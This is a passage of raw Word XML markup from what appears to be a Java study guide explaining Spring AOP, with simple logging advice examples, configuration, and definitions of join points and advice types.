    <w:p w14:paraId="308725FB" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BC8CA5A"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 After advice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7107B310"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After("execution(* com.example.service.*.*(..))")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6D5AE2"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public void logAfter(JoinPoint joinPoint) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3144637F"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System.out.println("Logging after method execution: " + joinPoint.getSignature());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A9DF59"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEA1580" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4147A3DF"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 Around advice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746669B7"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Around("execution(* com.example.service.*.*(..))")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F28B2B"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public Object logAround(ProceedingJoinPoint joinPoint) throws Throwable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED1A37F"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System.out.println("Around advice before method execution: " + joinPoint.getSignature());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7A25CA"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Object result = joinPoint.proceed();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78088A60"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System.out.println("Around advice after method execution: " + joinPoint.getSignature());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB17677"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return result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051A9B29"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BF24F8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FA3D53"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2. Enable AspectJ Auto Proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In your Spring configuration, enable AspectJ support by adding the following annotation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260F5CF7"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Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366E31F8"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EnableAspectJAutoProxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7FC073"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public class AppConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C06CEF4"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 Configuration for beans, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3E0B94"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734F1BA8"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3. Apply the Aspect</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is how your Spring components would look like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE4F5A4"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Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B066ED"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public class UserService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28695D7A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D33E0D1"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public void addUser(String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A44A769"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System.out.println("Adding user: " + name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D76028"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F909F7E" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A43911E"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public void deleteUser(String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D231EEA"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System.out.println("Deleting user: " + name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0765C9E2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FE9287"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F48446C" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>When to Use AOP in Spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2275B4FC" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1943"/>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Logging</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To add logging functionality before or after method execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ACE18B" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1943"/>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Transaction Management</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Automatically handle transactions around method executions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B555B9A" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1943"/>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Security</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To enforce security checks on certain methods or services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A7EF12" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1943"/>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Caching</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Add caching logic before or after method calls to improve performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498B745C" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1943"/>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Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Catch exceptions and add error handling functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FBB9B4" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Benefits of AOP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250FDE6C" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1944"/>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Separation of Concerns</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: AOP allows you to keep business logic separate from cross-cutting concerns like logging, transactions, and security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD49944" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1944"/>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Code Reusability</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Common functionality can be reused across multiple methods or classes without duplicating the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3308C336" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1944"/>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Easier Maintenance</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since the cross-cutting concerns are modularized into aspects, they can be managed and modified independently of business logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7235ABAE" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100833D7" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE"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lastRenderedPageBreak/>
        <w:t>AOP in Spring</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows you to separate cross-cutting concerns from the core business logic, making your code cleaner and more maintainable. It provides a powerful way to modularize repetitive code (like logging, security, and transactions) and apply it across various components in a Spring application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC2A102" w14:textId="77777777" w:rsidR="00CD6436" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CD643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AC48E57">
          <v:rect id="_x0000_i2136" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A7A25F" w14:textId="77777777" w:rsidR="00CD6436" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD6436" w:rsidP="00CD6436">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="456" w:name="_Toc196307936"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are JoinPoint, Advice, Pointcut, and Aspect?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="456"/>
    </w:p>
    <w:p w14:paraId="383D47B7" w14:textId="7E36200B" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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In </w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring AOP (Aspect-Oriented Programming)</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JoinPoint</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Advice</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Pointcut</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Aspect</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are the key concepts that enable the separation of cross-cutting concerns and modularization of aspects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F50077" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1497"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. JoinPoint:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1F9106" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1945"/>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A </w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JoinPoint</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a point during the execution of the program, such as method execution, where an aspect can be applied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090B6B13" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1945"/>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In the context of Spring AOP, a join point usually refers to a method execution, and it provides information about the method that is being invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16176DDB" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1945"/>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Examples of join points are method calls, method executions, or even field access (though field access is not supported in Spring AOP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDE15A5" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1945"/>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In Spring, </w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JoinPoint</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used to provide details about the method that is being advised, such as the method name, parameters, and target object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F11F6D"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4F7331" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1946"/>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A join point could be when a method in a service class is invoked, and an aspect (like logging) is applied to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2502C311" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1497"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. Advice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760239B7" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1947"/>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Advice</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the action taken at a particular </w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JoinPoint</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It is the actual code that is executed when the aspect is applied to a join point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6D19D1" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1947"/>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There are several types of advice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8435FA" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1947"/>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Before Advice</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Runs before the method execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D17837F" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1947"/>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After Advice</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Runs after the method execution, regardless of whether the method succeeded or failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1C8A83" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1947"/>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After Returning Advice</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
